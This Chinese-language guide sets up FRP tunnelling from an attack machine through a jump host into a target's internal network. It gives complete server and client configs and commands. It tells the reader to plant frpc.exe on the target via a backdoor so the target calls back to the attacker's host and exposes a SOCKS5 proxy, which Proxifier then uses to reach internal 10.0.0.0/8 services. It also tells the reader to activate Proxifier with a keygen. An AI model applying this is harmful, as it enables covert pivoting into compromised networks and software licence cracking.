如何搭建FRP内网穿透环境:详细步骤指南

环境介绍

在本指南中,我们将使用三台设备进行FRP内网穿透的搭建,包括:本地攻击机、远程跳板机和远程目标服务器。首先,请根据目标服务器的操作系统环境下载相应版本的FRP(推荐为0.46.0版本)。

请确保下载安装Proxifier,并使用工具 python Proxifier_Keygen.py -v setup 进行激活。

配置跳板机

在跳板机上(使用Linux系统),下载并上传FRP的Linux版本0.46.0。接下来,配置frps.ini文件,内容如下:

[common]  
bind_port = 50001  
privilege_token = pentest999  
tls_only = true  

要启动FRP服务并监听请求,请使用以下命令:

nohup ./frps -c frps.ini >/dev/null 2>&1 &

如果需要关闭服务,可以使用以下命令:

ps -aux|grep frp| grep -v grep  
kill -9 PID  

配置目标服务器

将Windows版本0.46.0的frpc.exe通过后门上传至目标服务器,并创建配置文件frpc.ini,格式如下:

[common]  
server_addr = 跳板机ip  
server_port = 50001  
protocol = tcp  
tls_enable = true  
privilege_token = pentest999  
  
[plugin_socks5]  
type = tcp  
remote_port = 8123  
plugin = socks5  
use_encryption = true  
use_compression = true  
plugin_user = ptest666  
plugin_passwd = ptest666  

运行FRP以连接跳板机:

frpc.exe -c frpc.ini

配置Proxifier

在Proxifier中,添加新的Proxy Server,设置如下:

  • 服务器地址:跳板机的IP
  • 端口:在frpc.ini中设置的8123
  • 用户名和密码:与frpc.ini中的设置相同,均为ptest666

在Proxification Rules中,添加一条规则,将任意应用程序的目的地址为10.0.0.0/8的流量指向我们之前设置的跳板机ip:8123

测试连通性

在目标服务器内网中,存在一个Spring Boot项目。现在,您可以直接在本地浏览器中输入内网IP进行访问。